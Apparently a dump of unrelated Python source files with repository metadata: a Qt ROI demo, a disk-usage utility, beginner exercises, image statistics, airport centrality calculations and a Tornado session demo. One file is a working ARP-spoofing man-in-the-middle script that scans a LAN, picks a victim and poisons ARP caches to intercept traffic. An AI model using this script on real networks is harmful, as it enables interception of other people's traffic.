roi.addHandle(ResizeHandle(roi, position=HandlePosition.BOTTOM))
roi.addHandle(ResizeHandle(roi, position=HandlePosition.RIGHT))
roi.addHandle(RotateHandle(roi, position=HandlePosition.RIGHT | HandlePosition.TOP))
view.addItem(roi)
def contextMenu(pos):
menu = QMenu()
def remove_handle():
h = roi.handles[1]
roi.removeHandle(h)
def rotate_90():
roi.setRotation(roi.rotation() + 82.)
rm_action = QAction('Remove handle', view)
rm_action.triggered.connect(remove_handle)
ro_action = QAction('Rotate by 82', view)
ro_action.triggered.connect(rotate_90)
menu.addAction(rm_action)
menu.addAction(ro_action)
menu.exec_(view.mapToGlobal(pos))
view.customContextMenuRequested.connect(contextMenu)
qapp.exec_() | [
"philipp.baust@gmail.com"
] | philipp.baust@gmail.com |
29f5a4ba9b7219b748f52e07f89157085e7a71a9 | 60c39402b6c957e5dfae0c63b5d7af13d9ba9350 | /man_in_the_middle.py | 8bd0947f1e8e9f0ddc3b0bb140e90309fd35c323 | [] | no_license | palex88/deauth | 91747ac1a0143c7601351ebdd874b5e748380d06 | 70365da4841b75d46223cb84aa154705aa482fdb | refs/heads/master | 2020-03-10T23:39:30.274222 | 2018-05-07T05:38:47 | 2018-05-07T05:38:47 | 129,645,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,989 | py | # !usr/bin/env/python
#
# File: man_in_the_middle.py
# Author: Alex Thompson
# Github: palex88@github.com
# Python Version: 2.7
# Purpose: This script runs a man in the middle attack. It finds the local network IP and MAC addresses, then displays
# to the user all the devices connected to the network. Once the user chooses one of them, the script uses
# scapy to send packets to the AP and the chosen host to route traffic between the AP and the host through
# the machine the script is running on.
#
# Usage: python man_in_the_middle.py
#
# Input: None
# Output: None
#
# Resources:
# https://scapy.readthedocs.io/en/latest/usage.html?highlight=srp
# https://github.com/hotzenklotz/WhoIsHome/blob/master/whoIsHome.py
# https://github.com/glebpro/Man-in-the-Middle/blob/master/m.py
# https://null-byte.wonderhowto.com/how-to/build-man-middle-tool-with-scapy-and-python-0163525/
#
import os
import sys
import time
import socket
import subprocess32
import nmap
from scapy import *
from scapy import all
def scan():
"""
Scans for hosts on a local network and returns hosts IP and MAC addresses.
Return:
Dict with IP and MAC address for all hosts.
"""
host_list = str(get_lan_ip()) + "/24"
nmap_args = "-sn"
scanner = nmap.PortScanner()
scanner.scan(hosts=host_list, arguments=nmap_args)
host_list = []
for ip in scanner.all_hosts():
host = {"ip" : ip}
if "hostname" in scanner[ip]:
host["hostname"] = scanner[ip]["hostname"]
if "mac" in scanner[ip]["addresses"]:
host["mac"] = scanner[ip]["addresses"]["mac"].upper()
host_list.append(host)
return host_list
def get_lan_ip():
"""
Scans for local IP addresses on the local network.
"""
try:
return ([(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close())
for s in [socket.socket(socket.AF_INET,socket.SOCK_DGRAM)]][0][1])
except socket.error as e:
sys.stderr.write(str(e) + "\n")
sys.exit(e.errno)
def get_local_network_addr():
"""
Get local network IP and MAC address.
"""
proc = subprocess32.Popen(["arp", "-a"], stdout=subprocess32.PIPE)
output = proc.stdout.read().split()
out_ip = output[1]
out_mac = output[3]
return_dict = {"ip": out_ip, "mac": out_mac}
return return_dict
def set_ip_forwarding(toggle):
if toggle:
print("Turing on IP forwarding:")
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
if not toggle:
print("Turing off IP forwarding:")
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
def reassign_arp(victim_ip, victim_mac, router_ip, router_mac, interface):
"""
Function notifies the AP and the host to start connecting to each other again.
:param victim_ip:
:param victim_mac:
:param router_ip:
:param router_mac:
:param interface:
:return:
"""
print("Reassigning ARP tables:")
# send ARP request to router as-if from victim to connect,
# do it 7 times to be sure
all.send(all.ARP(op=2, pdst=router_ip, psrc=victim_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victim_mac), count=7)
# send ARP request to victim as-if from router to connect
# do it 7 times to be sure
all.send(all.ARP(op=2, pdst=victim_ip, psrc=router_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=router_mac), count=7)
set_ip_forwarding(False)
def attack(victim_ip, victim_mac, router_ip, router_mac):
"""
Performs the MitM attack on the victim.
:param victim_ip:
:param victim_mac:
:param router_ip:
:param router_mac:
:return:
"""
all.send(all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst=victim_mac))
all.send(all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst=router_mac))
if __name__ == '__main__':
subprocess32.call("airmon-ng")
interface = raw_input("Enter wireless interface to use: ")
set_ip_forwarding(True)
hosts = scan()
num = 1
all_hosts = {}
for host in hosts:
if host.has_key("ip") and host.has_key("mac"):
all_hosts[str(num)] = host
print str(num) + " IP: " + host["ip"] + " MAC: " + host["mac"]
num += 1
host_id = raw_input("Enter the host ID to attack: ")
victim_ip = all_hosts[host_id]["ip"]
victim_mac = all_hosts[host_id]["mac"]
addr = get_local_network_addr()
router_ip = addr["ip"].replace("(", "").replace(")", "")
router_mac = addr["mac"].upper()
print "Router - IP: " + router_ip + " MAC: " + router_mac
print "Victim - IP: " + victim_ip + " MAC: " + victim_mac
while True:
try:
attack(victim_ip, victim_mac, router_ip, router_mac)
time.sleep(1.5)
except KeyboardInterrupt:
reassign_arp(victim_ip, victim_mac, router_ip, router_mac, interface)
break
sys.exit(1)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
26bc1342180ebbe498f0c43171c93b41246741b6 | 8f4c691f190a1d4ffd4261ea6dca6a2d3a96284c | /csa/csa/doctype/coach/test_coach.py | 0237f9215f3d3c946814d85ca059dd549fb3f4eb | [
"MIT"
] | permissive | Jishnu70055/usermanagement | 57abb738160fb213acdc2c71b40244eae4b06cee | f7b526335c2b99899afac188696071fa35df09ca | refs/heads/master | 2023-09-03T17:30:50.147750 | 2021-10-21T13:27:38 | 2021-10-21T13:27:38 | 399,362,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | # Copyright (c) 2021, s and Contributors
# See license.txt
# import frappe
import unittest
class TestCoach(unittest.TestCase):
pass
| [
"jishnudq70055@gmail.com"
] | jishnudq70055@gmail.com |
4e7fae46c7716e5f2f01b9716619049be364d6d0 | 651cec6cbee315bd12c93364c0a721aeed0e02d2 | /pnldash/extra.py | f46daae861d5bffa21997cad87fcf599607cf9af | [] | no_license | pnlbwh/pnldash | 44e3f20b5515ebf0dacf110bf3ac1b8ebebc383f | 454aea60794ea5dfe1be820a6f23328c0345ace9 | refs/heads/master | 2020-03-22T18:23:50.658315 | 2017-08-31T15:34:34 | 2017-08-31T15:34:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,677 | py | from __future__ import print_function
from plumbum import cli, local
import sys
import pandas as pd
import csv
import os
from .util import getsize
from .config import *
from .find import make_find
from .csvs import make_csvs
import logging
log = logging.getLogger(__name__)
def _heading(s):
return s + '\n' + len(s) * '-'
def _relativePath(p):
return local.path(p).relative_to(local.cwd)
def _compute_extra_table():
paths_tbl = pd.read_csv(PATHS_CSV.__str__())
if not paths_tbl.empty:
# raise Exception("'{}' is empty. Make sure".format(PATHS_CSV))
pipeline_paths = paths_tbl[paths_tbl.exists]['path']
else:
pipeline_paths = []
with open(FIND_TXT, 'r') as f:
found_paths = f.read().splitlines()
extraFiles = list(set(found_paths) - set(pipeline_paths))
sizes = [getsize(f) for f in extraFiles]
df = pd.DataFrame({'projectPath': local.cwd,
'path': extraFiles,
'sizeMB': sizes })
return df
def make_extra():
make_csvs()
make_find()
if EXTRA_CSV.exists():
find_modtime = os.path.getmtime(str(FIND_TXT))
paths_modtime = os.path.getmtime(str(PATHS_CSV))
extra_modtime = os.path.getmtime(str(EXTRA_CSV))
if extra_modtime > find_modtime and extra_modtime > paths_modtime:
log.info("Using cached file '{}' for unaccounted files.".format(EXTRA_CSV))
return pd.read_csv(EXTRA_CSV.__str__())
log.info("Compute unaccounted files, might take a minute the first time if your project directory is large")
df = _compute_extra_table()
df.to_csv(str(EXTRA_CSV), index=False)
return df
| [
"reckbo@bwh.harvard.edu"
] | reckbo@bwh.harvard.edu |
979f192450c56835036ea1573a2650dab6f9db10 | 7cd3dafa74f596e5e68cc0c2334bf4035e8d3256 | /ex32.py | 4f56420339fb5b8b1bf24d7b0be07c8ca1a90f9a | [] | no_license | afitzmaurice/learnpython | e300d5a1524d9cab9a959b0f36f54ee6282e9db2 | 88ec6b612ad3f7cd63844d21e1288e3e987a7328 | refs/heads/master | 2016-08-12T07:38:57.028688 | 2015-12-05T22:37:38 | 2015-12-05T22:37:38 | 46,667,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 978 | py | the_count = [1, 2, 3, 4, 5]
fruits = ['apples', 'oranges', 'pears', 'apricots']
change = [1, 'pennies', 2, 'dimes', 3, 'quarters']
#this first kind of for loop goes through a list
#note that number is defined by the for loop when it starts
for number in the_count:
print "This is count %d" % number
#same as above
for fruit in fruits:
print "A fruit of type: %s" % fruit
#note that we have to use %r since we don't know what's in it
for i in change:
print "I got %r" % i
#we can also build lists, first start with an empty one
elements = []
#then use the range function to do 0 to 5 counts
#note that the range does not include the last number, in this case, '6'
for i in range(0, 6):
print "Adding %d to the list" % i
#append is a function that lists understand
elements.append(i)
#the above for loop can be replaced with "elements = range(6)"
#now we can use the for loop to print them as well
for i in elements:
print "Element was: %d" % i
| [
"ashfitzmaurice@gmail.com"
] | ashfitzmaurice@gmail.com |
f262c1884c06159a8d3c99fba9887b52ddab876d | 38da8d3b3dbeabc2e0cba77c8e8b18d2557460d9 | /Análisis exploratorio/analisis_exploratorio_imagenes.py | afd35813a828b71b065dada31f7d6d27386e2223 | [] | no_license | san13660/data-science-proyecto-2 | 8bab71516a4f097132894f688650123e44b7af5c | df6d396d2fdf8ee8fdfd43bcfe70fc6c80c344a4 | refs/heads/master | 2023-01-13T23:34:57.803243 | 2020-11-19T22:11:59 | 2020-11-19T22:11:59 | 293,656,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,121 | py | from PIL import Image
import os.path
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from os import walk
### Se hace una lectura de las imagenes
heightArray = []
widthArray = []
cantidadPixeles = []
pathImagenPequena = ''
pathImagenGrande = ''
for (dirpath, dirnames, filenames) in walk('boneage-training-dataset'):
for filename in filenames:
### Se extrae las dimensiones de las imagenes
with Image.open('boneage-training-dataset/' + filename) as image:
width, height = image.size
heightArray.append(height)
widthArray.append(width)
cantidadPixeles.append(height * width)
if max(cantidadPixeles) == height * width:
pathImagenGrande = 'boneage-training-dataset/' + filename
if min(cantidadPixeles) == height * width:
pathImagenPequena = 'boneage-training-dataset/' + filename
### Se revisa la distribucion que hay en las alturas de las imagenes
plt.hist(heightArray, bins=10, color='blue')
plt.show()
### Se revisa la distribucion que hay en los anchos de las imagenes
plt.hist(widthArray, bins=10, color='orange')
plt.show()
### Se revisa la distribucion que hay en la cantidad de pixeles en las imagenes
plt.hist(cantidadPixeles, bins=10, color='red')
plt.show()
### Se hace una revision de cuales son las dimension mas pequeñas y mas grandes
print("La altura mas grande es: ", str(max(heightArray)))
print("La altura mas pequeña es: ", str(min(heightArray)))
print("La anchura mas grande es: ", str(max(widthArray)))
print("La anchura mas pequeña es: ", str(min(widthArray)))
print("La cantidad de pixeles mas grande en un imagen es: ", str(max(cantidadPixeles)))
print("La cantidad de pixeles mas pequeña en un imagen es: ", str(min(cantidadPixeles)))
### Se hace una comparacion de la imagen mas pequeña y la mas grande para darnos una idea
### de que tanto afectaria redimensionar el tamaño de la imagen
img = mpimg.imread(pathImagenPequena)
imgplot = plt.imshow(img)
plt.show()
img = mpimg.imread(pathImagenGrande)
imgplot = plt.imshow(img)
plt.show()
| [
"urielsonic@gmail.com"
] | urielsonic@gmail.com |
43d0b188562d1f33cfa7372f8ffe2841e9ddbcd3 | 39072c596e35ed011ee9a9a2e21598b5939aaa3e | /circle.py | cbdbe7bdd53b5ef80bdbe540215d9e1bd8b2a70a | [] | no_license | Jessica-Thomas/PythonPractice | da72922fb8834d903827e19af1f75afba76f2434 | a449c07f8fefac95cc2d4a89d90af304ce3357b9 | refs/heads/main | 2023-03-16T10:52:49.013659 | 2021-03-03T23:24:26 | 2021-03-03T23:24:26 | 330,848,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 358 | py | class Circle:
def __init__(self, diameter):
self.diameter = diameter
@property
def radius(self):
return self.diameter / 2
@radius.setter
def radius(self, radius):
self.diameter = radius * 2
small = Circle(10)
print(small.diameter)
print(small.radius)
small.radius = 10
print(small.diameter) | [
"jessica.thomas648@gmail.com"
] | jessica.thomas648@gmail.com |
08615aac82ac581b68edd26ecccabf3cfe930fcd | e3349214c805f86f9958ab99bed4e7c54056a700 | /yundijie/ydj_transfer.py | 2641d60418cf2ccb87cb49a260cd07fe34f88d54 | [] | no_license | wwdd23/spider_script | 05461b0306aae2120c3dcf9afbf5578a56268f99 | 4a925f94bacff143e4c04b5e3296d2b2ec5e4651 | refs/heads/master | 2021-01-10T23:38:04.990672 | 2016-10-18T03:37:53 | 2016-10-18T03:37:53 | 70,413,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,732 | py | #!/usr/bin/env python
#-*- coding: utf-8 -*-
import httplib
import json
import StringIO
import gzip
import pymongo
import get_ua
import datetime
conn = httplib.HTTPConnection("yundijie.com")
def trans(params):
ua = get_ua.get_random_ua()
headers = {
'Content-Type':'application/json; charset=UTF-8',
'Authorization':'Basic 6auY5Lya5aifOjEyMzQ1Ng==',
'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh-CN,zh;q=0.8',
#'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 (FoxPlus) Firefox/2.0.0.14',
'User-Agent': ua,
#'Cookie': cookies,
'Cookie': 'JSESSIONID=FA421051C0F377D492AC21AFE2794041; cla_sso_token=9ca653147a0945fc9f62; login_name=BDtest17; Hm_lvt_c01e035e5dc6df389fa1746afc9cf708=1476429644; Hm_lpvt_c01e035e5dc6df389fa1746afc9cf708=1476684919',
#'Cookie':'JSESSIONID=AC5AE2594627900BCC1B188BD5E30419; Hm_lvt_c01e035e5dc6df389fa1746afc9cf708=1475908244,1475983325,1475994954; Hm_lpvt_c01e035e5dc6df389fa1746afc9cf708=1476331358; cla_sso_token=41ac3ae3d4e64b09b923; login_name=BDtest17'
}
#params = ({"airportCode":"CDG","startLocation":"49.009670,2.547860","endLocation":"48.873642,2.3062469","serviceDate":"2016-11-11 08:00:00","startDate":"2016-11-12","startTime":"08:00","flightInfo":{"is_custom":1},"airportInfo":{"airportCode":"CDG","airportHotWeight":0,"airportId":449,"airportLocation":"49.009670,2.547860","airportName":"戴高乐国际机场","bannerSwitch":1,"isHotAirport":0,"landingVisaSwitch":0,"cityId":138,"location":"49.009670,2.547860"},"pickupAddress":{"placeAddress":"35 Rue de Berri, 75008 Paris, 法国","placeIcon":"https://maps.gstatic.com/mapfiles/place_api/icons/lodging-71.png","placeId":"ChIJEzb-M8Fv5kcR9yv80he-4sA","placeLat":48.873642,"placeLng":2.3062469,"placeName":"Hotel Champs Elysées Plaza*****","score":0.9033104181289673,"source":"google"}})
params = params
conn.request("POST", "/price/query_transfer_quotes", json.JSONEncoder().encode(params), headers)
response = conn.getresponse()
data = response.read()
if response.status == 200:
print 'success'
print data
data = StringIO.StringIO(data)
print data.len
try:
gz = gzip.GzipFile(fileobj=data)
print gz
data = gz.read()
gz.close()
except:
print "none gz pass"
gz.close()
return
client = pymongo.MongoClient('localhost', 27017)
spider = client['test_spider']
spiderdata = spider['spiderdata']
datas = json.loads(data)
print datas.keys()
print datas['status']
#for data in datas['data']:
params_info = json.dumps(params, ensure_ascii=False, indent=4)
params_data = json.loads(params_info)
airport = params_data['airportInfo']['airportName']
address = params_data['transferAddress']['placeName']
startDate = params_data['startDate']
serviceDate = params_data['serviceDate']
print airport
print address
print startDate
print serviceDate
spiderdata.insert_one({
"created_at": (datetime.date.today()).isoformat(),
"startDate": startDate,
"serviceDate": serviceDate,
"airportName": airport,
"address": address,
"type": "transfer",
"result": datas['data']
})
print(data)
else:
print 'fail'
conn.close()
| [
"wudi@haihuilai.com"
] | wudi@haihuilai.com |
ac3b79bcd97dc02636e24488dfa93048a5395d63 | 53214f87d5de4d50ff42b218b6a169edde357315 | /airplane_calculations.py | d20a6f69e7ec84255064a696f1d640aa056e3908 | [] | no_license | brian-cuny/620project1 | 5f34a092cb9fc3cb6870ffada9b3b48d230fa631 | 3ef18966214ccac51e05c13b5545f7b3f6003bb1 | refs/heads/master | 2020-03-19T16:52:52.320302 | 2018-06-25T22:36:29 | 2018-06-25T22:36:29 | 136,734,504 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,269 | py | import csv
import networkx as nx
import matplotlib.pyplot as plt
if __name__ == '__main__':
with open('airports_sub.csv') as read_file:
airports = {int(r[0]): r for r in csv.reader(read_file, delimiter=',')}
with open('connections_sub.csv') as read_file:
connections = [(int(r[0]), int(r[1])) for r in csv.reader(read_file, delimiter=',')]
G = nx.Graph()
G.add_edges_from(connections)
degree_centrality = nx.degree(G)
# print(degree_centrality)
degree_closeness = nx.closeness_centrality(G)
# print(degree_closeness)
eigenvector_centrality = nx.eigenvector_centrality(G)
# print(eigenvector_centrality)
betweenness_centrality = nx.betweenness_centrality(G)
# print(betweenness_centrality)
for ap, deg in degree_centrality:
airports[ap].append(deg)
airports[ap].append(degree_closeness[ap])
airports[ap].append(eigenvector_centrality[ap])
airports[ap].append(betweenness_centrality[ap])
with open('calculations.csv', 'w') as write_file:
writer = csv.writer(write_file)
writer.writerow(('ID', 'Airport', 'Country', 'Centrality', 'Closeness', 'Eigenvector', 'Betweenness'))
for a in airports.values():
writer.writerow(a)
| [
"brian.weinfeld@gmail.com"
] | brian.weinfeld@gmail.com |
5a091ab107c4e5d163d242d119c57c1fbd321eb4 | 10ca8a1d04eb2d95b5153725366d1483a21ce085 | /src/svviz/__init__.py | 8eede553f204534eeb5465c2d5329bdb6e786fdb | [
"MIT"
] | permissive | apregier/svviz | b5c04620d47eee4b92e61c0549294c07ace06e2b | e3e0cbee3eda104199f70142d0fc9264d613f1f7 | refs/heads/master | 2021-01-17T18:32:56.835803 | 2015-10-29T21:49:24 | 2015-10-29T21:49:24 | 45,568,368 | 1 | 0 | null | 2015-11-04T21:24:32 | 2015-11-04T21:24:32 | null | UTF-8 | Python | false | false | 25 | py | __version__ = "1.3.3dev"
| [
"nspies@stanford.edu"
] | nspies@stanford.edu |
9268005884d19f86e946b466114a10b7ff5c1c9e | e5beafe9aac8a90eb360ca46628d547d5c50677c | /tests/conftest.py | 257cca49f9554a5b3a4a27553bed4858d0fcdf38 | [
"MIT"
] | permissive | flask-dashboard/Flask-MonitoringDashboard | 84c3a479d6eb2bc16201984d3988e52091b23208 | bd41a2396d0770ad14e5b739db42c69ecd85cd49 | refs/heads/master | 2023-09-01T03:09:12.583145 | 2023-08-22T21:16:55 | 2023-08-22T21:16:55 | 87,939,708 | 747 | 168 | MIT | 2023-08-22T21:07:23 | 2017-04-11T13:50:14 | Python | UTF-8 | Python | false | false | 167 | py | """Import all fixtures here."""
from tests.fixtures.dashboard import * # noqa
from tests.fixtures.database import * # noqa
from tests.fixtures.models import * # noqa
| [
"patrick.vogel@seetickets.nl"
] | patrick.vogel@seetickets.nl |
e3a92cfa48a1c688c0d840416cf412ca89c8dfe9 | a57b6c021fe307a03f2bcbc79cb1dac848e94ee3 | /session_test.py | f0ba7aba45bb6545e51ac3acc43c330b2d59011b | [] | no_license | wangjunji1/tornado_footprint | 432e73a422c1676a8488ccc9a53606b116146bf6 | 5ecbb98e036327e36f26f149f9b31f85e7fada7e | refs/heads/master | 2021-01-21T20:26:05.065425 | 2016-12-07T00:01:33 | 2016-12-07T00:01:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,506 | py | import tornado.ioloop
import tornado.web
import os,time
from hashlib import sha1
session_container = {}#全局字典用于保存每个登录用户的session
create_session_id = lambda: sha1(bytes('%s%s' % (os.urandom(6),time.time()),encoding='utf-8')).hexdigest()
class Session(object):
cookie_name = '__sessionID__'#客户端用于保存session_id的cookie字段名
def __init__(self,request):#这个类与下面的XXXHandler类没有继承关系,需要传入它们的实例作为参数
session_id = request.get_cookie(Session.cookie_name)
if session_id:
self._id = session_id
else:
self._id = create_session_id()
request.set_cookie(Session.cookie_name,self._id)#无论之前有没有cookie,都需要重新设置
def __setitem__(self, key, value):
if self._id in session_container:
session_container[self._id][key] = value
else:
session_container[self._id] = {key:value}
def __getitem__(self, key):
return session_container[self._id].get(key)
def __delitem__(self, key):
del session_container[self._id][key]
class BaseHandler(tornado.web.RequestHandler):
def initialize(self):
# 这是个钩子方法,在所有请求方法之前执行,所以这个方法中添加的对象属性所有子类中都可用
# 在创建Session实例时传入自己,建立双向关系
self.my_session = Session(self)
class MainHandler(BaseHandler):
def get(self):
print(self.my_session['user'])
print(self.my_session['pos'])
self.write('index')
class LoginHandler(BaseHandler):
def get(self):
self.render('login.html',**{'status':''})
def post(self):
username = self.get_argument('username')
password = self.get_argument('password')
if username == 'zs' and password == '111':
self.my_session['user'] = 'zs'
self.my_session['pos'] = '113.32'
self.redirect('/index')#内部跳转
else:
self.render('login.html',**{'status':'用户名或密码错误'})#参数要以命名参数的形式传入
settings = {
'template_path': 'template',
'login_url': '/login'
}
application = tornado.web.Application([
(r'/index',MainHandler),
(r'/login',LoginHandler),
],**settings)#settings参数要以命名参数的形式传入
if __name__ == '__main__':
application.listen(8000)
tornado.ioloop.IOLoop.instance().start() | [
"815666124@qq.com"
] | 815666124@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.